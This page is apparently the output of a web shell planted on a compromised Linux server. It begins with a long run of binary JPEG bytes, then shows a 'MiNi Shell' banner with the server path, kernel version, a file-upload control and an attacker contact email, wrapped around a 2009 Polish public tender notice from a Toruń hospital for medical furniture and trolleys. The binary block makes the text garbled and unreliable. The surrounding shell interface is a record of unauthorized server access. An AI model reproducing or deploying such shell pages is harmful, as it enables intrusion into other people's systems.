JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090909/312330-N-2009.html

<p class="kh_header"><b>Toruń: Dostawa mebli medycznych dla Oddziału Noworodków, Pododdziału Izolacyjnego, Pododdziału Ginekologicznego oraz dla Pracowni Badań Prenatalnych, wózka do przewożenia materiału do sterylizacji, wózków do transportu brudnej bielizny do pralni, wózka oddziałowego wielofunkcyjnego, wózków do zbierania brudnej bielizny na Oddziale, wózków do przewożenia pacjentek w pozycji leżącej, wózków do transportu pacjentek w pozycji siedzącej oraz chodzika dla pacjentek.</b><br>
<b>Numer ogłoszenia: 312330 - 2009; data zamieszczenia: 09.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli medycznych dla Oddziału Noworodków, Pododdziału Izolacyjnego, Pododdziału Ginekologicznego oraz dla Pracowni Badań Prenatalnych, wózka do przewożenia materiału do sterylizacji, wózków do transportu brudnej bielizny do pralni, wózka oddziałowego wielofunkcyjnego, wózków do zbierania brudnej bielizny na Oddziale, wózków do przewożenia pacjentek w pozycji leżącej, wózków do transportu pacjentek w pozycji siedzącej oraz chodzika dla pacjentek..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
- mebli medycznych dla Oddziału Noworodków, Pododdziału Izolacyjnego, Pododdziału Ginekologicznego oraz dla Pracowni Badań Prenatalnych - Zadanie Nr 1 tj.:
I. Meble medyczne dla Oddziału Noworodków:
1.1 Krzesło - ławeczka z 3-ma siedziskami na stelażu metalowym, siedziska z profilowanego tworzywa, 145 x 62 x 82 cm - 1 szt.;
1.2 Krzesło - ławeczka z 4-ma siedziskami na stelażu metalowym, siedziska z profilowanego tworzywa, 197 x 62 x 82 cm - 1 szt.;
1.3 Krzesło - fotel dla matek - 3 szt.;
1.4 Krzesło do biurka, obrotowe z podłokietnikami , tapicerowane materiałem zmywalnym - 8 szt.;
2.1 Tapczan, 200 x 80 cm - 1 szt.;
3.1 Stanowisko do pielęgnacji niemowląt - kąpielowe z wanienką i szafką, 90 x 60 x 89 cm - 1 kpl.;
4.1 Szafa lekarska dzielona poziomo, górą przeszklona z drzwiami i półkami, 90 x 55 x 200 cm - 1 szt.;
5.1 Stanowisko wypisów - szafka 2-komorowa z drzwiami i 4-ma szufladami, 90 x 60 x 89 cm - 1 kpl.;
6.1 Szafa lekarska górą przeszklona na sprzęt medyczny i chirurgiczny, 90 x 55 x 200 cm - 1 szt.;
7.1 Szafa lekarska na sprzęt medyczny, dzielona poziomo z drzwiami i półkami	90 x 55 x 200 cm - 3 szt.;
7.2 Szafa lekarska na sprzęt medyczny z koszami i kuwetami, 60 x 55 x 200 cm - 3 szt.;
8.1 Stanowisko do pielęgnacji noworodka z 4-ma szufladami, blatem z tworzywa i materacykiem, 75 x 77 x 89 cm - 1 kpl.;
II. Meble medyczne dla Pododdziału Izolacyjnego i Pododdziału Ginekologicznego.
Brudownik:
1.1 Szafa ze stali nierdzewnej, dzielona w poziomie, górą otwarta z 3-ma półkami na baseny, dołem z drzwiami zamykanymi na klucz i półką	, 80 x 45 x 200 cm - 2 szt.;
1.2 Regał ścienny ze stali nierdzewnej z 3-ma półkami	80 x 45 x 70 cm - 2 szt.;
1.3 Szafka wisząca ze stali nierdzewnej, dwudrzwiowa z półką, zamykana na klucz	90 x 35 x 70 cm - 2 szt.;
Dyżurka:
2.1	Stanowisko do pobierania krwi, na stelażu metalowym z 2-ma regulowanymi podpórkami ręki - 2 kpl.;
III. Meble dla Pracowni Badań Prenatalnych:
1.1 Stanowisko pracy przy komputerze- z 4 szufladami, półką pod klawiaturę i podstawą pod komputer	120 x 60 x 75 cm - 1 kpl.;
1.2 Krzesło komputerowe obrotowe na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.;
1.3 Biurko z wbudowanym kontenerem 4-szufladowym	125 x 70 x 75 cm - 1 szt.;
1.4 Kozetka lekarska tapicerowana materiałem zmywalnym - 1 szt.;
1.5 Krzesło na stelażu chromowanym z siedziskiem tapicerowanym - 2 szt.;
1.6 Krzesło biurowe, z podłokietnikami, tapicerowane materiałem zmywalnym - 3 szt.;
1.7 Wieszak na ubrania, stojący, chromowany - 1 szt.;
1.8 Siedzisko dla pacjentów, z 5-ma siedzeniami na stelażu metalowym, siedziska z profilowanego tworzywa - 1 szt.;
- 1 szt. wózka do przewożenia materiału do sterylizacji, 2 szt. wózków do transportu brudnej bielizny do pralni - Zadanie Nr 2;
- 1 szt. wózka oddziałowego wielofunkcyjnego - Zadanie Nr 3;
- 2 szt. wózków do zbierania brudnej bielizny na Oddziale, 3 szt. wózków do przewożenia pacjentek w pozycji leżącej, 4 szt. wózków do transportu pacjentek w pozycji siedzącej - Zadanie nr 4;
- 1 szt. chodzika dla pacjentek - Zadanie Nr 5..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 33.19.23.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy potwierdzą spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy - Prawo zamówień publicznych oraz dołączą do oferty wymienione poniżej dokumenty i oświadczenia. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów, oświadczeń zgodnie z formułą /spełnia/- /nie spełnia/. Z treści załączonych do oferty dokumentów i oświadczeń musi wynikać jednoznacznie, że warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. należy załączyć w ofercie:
a/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem przez organ wydający w/w dokument w wymaganym terminie pod kątem aktualności stanu faktycznego z zapisami w w/w dokumencie.     
b/ Oświadczenie o nie wykluczeniu na podstawie art. 24 oraz spełnieniu warunków zawartych w art. 22 ust. 1 Prawa zamówień publicznych wg Załączników Nr 5 i Nr 6 sporządzonych przez Zamawiającego do niniejszej SIWZ.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia, Wykonawca zobowiązany jest załączyć do oferty następujące dokumenty: 
a/ wykaz wykonanych min. 3 dostaw mebli medycznych o wartości minimalnej dla poszczególnych zadań:
- Zadanie Nr 1 - 20.000,00 zł,
- Zadanie Nr 2 - 10.000,00 zł,
- Zadanie Nr 3 -   1.000,00 zł,
- Zadanie Nr 4 - 50.000,00 zł,
- Zadanie Nr 5 -      500,00 zł,
brutto każda dostawa w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 3 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertę na kilka zadań musi wykazać się zrealizowanymi 
3 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.
3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, należy załączyć następujące dokumenty:
a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:
- Zadanie Nr 1 - 20.000,00 zł,
- Zadanie Nr 2 -   5.000,00 zł,
- Zadanie Nr 3 -   1.000,00 zł,
- Zadanie Nr 4 - 30.000,00 zł,
- Zadanie Nr 5 -      500,00 zł,
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.
4. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca winien dostarczyć: 
a/ atest higieniczny na oferowane meble medyczne przeznaczone do wyposażenia placówek służby zdrowia,
b/ atest higieniczny PZH dotyczący użytych materiałów do produkcji mebli z płyty wiórowej laminowanej.
c/ 	certyfikat dla elementów drewnopodobnych potwierdzający spełnianie normy E-1.
d/ certyfikat ISO dla producenta - deklaracja producenta o zgodności wyrobu z powołanymi przez niego normami wyczerpującymi charakterystykę funkcjonalną i bezpieczeństwa w przypadku wyrobów nieseryjnych,
e/ deklarację zgodności CE lub wpis do Rejestru Wyrobów Medycznych potwierdzający, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 kwietnia 2004 r. o wyrobach medycznych (Dz. U. z 2004 r. Nr 93, poz. 896 z późn. zm.) - dotyczy tylko wyrobów medycznych,
f/ foldery, katalogi/ prospekty oferowanych wyrobów.
5. Oświadczenie o podwykonawstwie, w przypadku gdy Wykonawca zamierza powierzyć wykonanie zamówienia lub wykonanie części zamówienia podwykonawcom, wskazując tę część.
6. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu na składanie ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa powyżej należy je zastąpić dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym Wykonawca ma siedzibę lub miejsca zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych - pokój nr 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2009 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane w 85% z Mechanizmu Finansowania EOG i w 15% z budżetu Samorządu Województwa Kujawsko-Pomorskiego w ramach projektu nr PL 0481 pn. /Zdrowa matka - zdrowy noworodek. Kompleksowy program opieki perinatalnej w Wojewódzkim Szpitalu Zespolonym w Toruniu/..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mebli medycznych dla Oddziału Noworodków, Pododdziału Izolacyjnego, Pododdziału Ginekologicznego oraz dla Pracowni Badań Prenatalnych - Zadanie Nr 1..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli medycznych dla Oddziału Noworodków, Pododdziału Izolacyjnego, Pododdziału Ginekologicznego oraz dla Pracowni Badań Prenatalnych - Zadanie Nr 1 tj.:
I. Meble medyczne dla Oddziału Noworodków:
1.1 Krzesło - ławeczka z 3-ma siedziskami na stelażu metalowym, siedziska z profilowanego tworzywa, 145 x 62 x 82 cm - 1 szt.;
1.2 Krzesło - ławeczka z 4-ma siedziskami na stelażu metalowym, siedziska z profilowanego tworzywa, 197 x 62 x 82 cm - 1 szt.;
1.3 Krzesło - fotel dla matek - 3 szt.;
1.4 Krzesło do biurka, obrotowe z podłokietnikami , tapicerowane materiałem zmywalnym - 8 szt.;
2.1 Tapczan, 200 x 80 cm - 1 szt.;
3.1 Stanowisko do pielęgnacji niemowląt - kąpielowe z wanienką i szafką, 90 x 60 x 89 cm - 1 kpl.;
4.1 Szafa lekarska dzielona poziomo, górą przeszklona z drzwiami i półkami, 90 x 55 x 200 cm - 1 szt.;
5.1 Stanowisko wypisów - szafka 2-komorowa z drzwiami i 4-ma szufladami, 90 x 60 x 89 cm - 1 kpl.;
6.1 Szafa lekarska górą przeszklona na sprzęt medyczny i chirurgiczny, 90 x 55 x 200 cm - 1 szt.;
7.1 Szafa lekarska na sprzęt medyczny, dzielona poziomo z drzwiami i półkami	90 x 55 x 200 cm - 3 szt.;
7.2 Szafa lekarska na sprzęt medyczny z koszami i kuwetami, 60 x 55 x 200 cm - 3 szt.;
8.1 Stanowisko do pielęgnacji noworodka z 4-ma szufladami, blatem z tworzywa i materacykiem, 75 x 77 x 89 cm - 1 kpl.;
II. Meble medyczne dla Pododdziału Izolacyjnego i Pododdziału Ginekologicznego.
Brudownik:
1.1 Szafa ze stali nierdzewnej, dzielona w poziomie, górą otwarta z 3-ma półkami na baseny, dołem z drzwiami zamykanymi na klucz i półką	, 80 x 45 x 200 cm - 2 szt.;
1.2 Regał ścienny ze stali nierdzewnej z 3-ma półkami	80 x 45 x 70 cm - 2 szt.;
1.3 Szafka wisząca ze stali nierdzewnej, dwudrzwiowa z półką, zamykana na klucz	90 x 35 x 70 cm - 2 szt.;
Dyżurka:
2.1	Stanowisko do pobierania krwi, na stelażu metalowym z 2-ma regulowanymi podpórkami ręki - 2 kpl.;
III. Meble dla Pracowni Badań Prenatalnych:
1.1 Stanowisko pracy przy komputerze- z 4 szufladami, półką pod klawiaturę i podstawą pod komputer	120 x 60 x 75 cm - 1 kpl.;
1.2 Krzesło komputerowe obrotowe na stelażu metalowym chromowanym z siedziskiem i oparciem tapicerowanym i podłokietnikami - 2 szt.;
1.3 Biurko z wbudowanym kontenerem 4-szufladowym	125 x 70 x 75 cm - 1 szt.;
1.4 Kozetka lekarska tapicerowana materiałem zmywalnym - 1 szt.;
1.5 Krzesło na stelażu chromowanym z siedziskiem tapicerowanym - 2 szt.;
1.6 Krzesło biurowe, z podłokietnikami, tapicerowane materiałem zmywalnym - 3 szt.;
1.7 Wieszak na ubrania, stojący, chromowany - 1 szt.;
1.8 Siedzisko dla pacjentów, z 5-ma siedzeniami na stelażu metalowym, siedziska z profilowanego tworzywa - 1 szt.;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa 1 szt. wózka do przewożenia materiału do sterylizacji, 2 szt. wózków do transportu brudnej bielizny do pralni - Zadanie Nr 2..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 1 szt. wózka do przewożenia materiału do sterylizacji, 2 szt. wózków do transportu brudnej bielizny do pralni - Zadanie Nr 2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa 1 szt. wózka oddziałowego wielofunkcyjnego - Zadanie Nr 3..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 1 szt. wózka oddziałowego wielofunkcyjnego - Zadanie Nr 3..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa 2 szt. wózków do zbierania brudnej bielizny na Oddziale, 3 szt. wózków do przewożenia pacjentek w pozycji leżącej, 4 szt. wózków do transportu pacjentek w pozycji siedzącej - Zadanie nr 4..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 2 szt. wózków do zbierania brudnej bielizny na Oddziale, 3 szt. wózków do przewożenia pacjentek w pozycji leżącej, 4 szt. wózków do transportu pacjentek w pozycji siedzącej - Zadanie nr 4..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa 1 szt. chodzika dla pacjentek - Zadanie Nr 5..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 1 szt. chodzika dla pacjentek - Zadanie Nr 5..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com